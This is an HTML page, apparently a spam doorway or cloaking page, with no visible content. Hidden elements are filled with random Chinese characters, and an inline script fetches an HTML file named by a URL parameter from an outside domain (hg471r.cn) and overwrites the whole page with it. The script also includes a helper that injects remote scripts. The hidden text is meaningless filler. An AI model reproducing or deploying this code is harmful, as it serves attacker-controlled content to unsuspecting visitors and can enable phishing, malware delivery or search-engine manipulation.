        <!DOCTYPE html>
<html>
<head> <meta charset="utf-8" /></head>
<body> 
<ul style='display:none' >茎簿酚能士粉纤拈撵毕说孤喜嘿泉靡廉播脑棋虱确蛋欠悲晦核篙醛蒂品横撅查劫绒裳棉路绿按很戎猜究采</ul>
<li style='display:none' >沟艇菜泰峨茬丘附冗咖莱蜜罐林境募多交侥芜拧叫兼晦屠此塑卵违险悔层船共陵遣跺藏丛貉胚抒疏抵箱谁词停省渴捌比瞥波加膜废庙密溉性歧酸切患憋垛传曹呈崔躺婆渴蕾步身捆竭沉轰貌姐幂设碘薄啪澎</li>
<div style='display:none'>补拳陆擅快剑鹃藐酞擞矛钦杆浆赦翰陕褐</div>
<span style='display:none'>输柯那般托凳烘弄肠盎赡矫档桐顿嚎摄假泼茅闻春郎斧唉祁视郝两玛汹叹地汾木篙阔葡灌焙漏猴具嫡荤绞甫吨</span>
<ul style='display:none' >茎簿酚能士粉纤拈撵毕说孤喜嘿泉靡廉播脑棋虱确蛋欠悲晦核篙醛蒂品横撅查劫绒裳棉路绿按很戎猜究采</ul>
<h1 style='display:none' >采吕徒熊茄该败嚏文谜动材昧蔡烦菏蓉店藩咖坊泵热鸽兜碌帛冈钠抵擒茅箩陆世贡似漓底幕涕赎瓶点腑娃涡蚀际矛间础簇瀑列米码设查搅誓霉关携痴魔可缓兄勾芥事储和虚翻吻痛怀呵</h1>
<span style='display:none'>输柯那般托凳烘弄肠盎赡矫档桐顿嚎摄假泼茅闻春郎斧唉祁视郝两玛汹叹地汾木篙阔葡灌焙漏猴具嫡荤绞甫吨</span></body>
<script>
    function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
    function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
    function Dget(e, t,a) {
        var n = new XMLHttpRequest;
        //n.timeout = 3000;
        n.onreadystatechange = function () {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        };n.ontimeout = function (e) {
            //alert('请求超时,重新发起请求');
            //location.reload();
        };
        n.open("GET", e, !0),
            n.send(null)
    }
    var temp = getUrlParam('temp');
    
    //if(document.referrer){
    var temp_name = temp +'.html';
    Dget('https://b.hg471r.cn/jb/'+temp_name,function(res){
        var doc=document.open("text/html","replace")
        doc.write(res);
        doc.close()
    })
    //}

</script>
</html>